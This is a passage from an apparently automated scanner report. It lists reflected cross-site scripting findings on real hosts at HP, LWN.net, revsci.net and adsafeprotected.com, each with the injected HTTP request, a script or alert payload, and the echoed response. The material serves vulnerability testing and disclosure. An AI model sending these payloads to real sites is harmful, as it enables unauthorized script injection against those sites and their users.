<a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.95. https://h41183.www4.hp.com/inflexion/ [jumpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://h41183.www4.hp.com
Path:   /inflexion/

Issue detail

The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a was submitted in the jumpid parameter. This input was echoed as 313d2\" style=x:expression(alert(1)) bdc6c99b05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1
Host: h41183.www4.hp.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r PHP/5.3.6
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
<input type="hidden" name="jumpid" value="inflexion313d2\" style=x:expression(alert(1)) bdc6c99b05a" />
...[SNIP]...

3.96. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 8bc34<script>alert(1)</script>efd39a0477d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076088bc34<script>alert(1)</script>efd39a0477d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 16:17:37 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 05 Sep 2011 16:17:37 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:36 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076088BC34<SCRIPT>ALERT(1)</SCRIPT>EFD39A0477D" was not recognized.
*/

3.97. http://lwn.net/Articles/456878/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf79"><script>alert(1)</script>dd792ac85a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:09 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/?format=printable" rel="nofollow">
...[SNIP]...

3.98. http://lwn.net/Articles/456878/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badde"><script>alert(1)</script>19cf5213da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878badde"><script>alert(1)</script>19cf5213da2/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:12 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles/456878badde"><script>alert(1)</script>19cf5213da2/?format=printable" rel="nofollow">
...[SNIP]...

3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f55"><script>alert(1)</script>2fc14d4e749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:07 GMT
Server: Apache
Expires: -1
Content-Length: 18612
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<a href="/Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1?format=printable" rel="nofollow">
...[SNIP]...

3.100. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb31"><script>alert(1)</script>b977975e439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:53 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.101. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8fd"><script>alert(1)</script>35c56d0c976 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:56 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.102. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cab"><script>alert(1)</script>8b9a2d74c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:58 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.103. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec0c"><script>alert(1)</script>2fce89b00d5 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.2.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:56:03 GMT
Server: Apache
Expires: -1
Content-Length: 4355
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5?format=printable" rel="nofollow">
...[SNIP]...

3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81aab"><script>alert(1)</script>691fb0a816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:51 GMT
Server: Apache
Expires: -1
Content-Length: 4341
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1?format=printable" rel="nofollow">
...[SNIP]...

3.105. http://pixel.adsafeprotected.com/jspix [anId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5a70"-alert(1)-"ac321b82b88 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E81A015BB8B9EE5C806AFF54FF4EB670; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dje"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.106. http://pixel.adsafeprotected.com/jspix [campId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99de3"-alert(1)-"c090c6b65a8 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1AACC4AF8BC204CA4CB77100B164407; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dph"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6942"-alert(1)-"91db8ff3473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E1323870265AF82DEF33FC529D00C2E5; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
KIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dy6"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.108. http://pixel.adsafeprotected.com/jspix [pubId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03b4"-alert(1)-"37599c03060 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
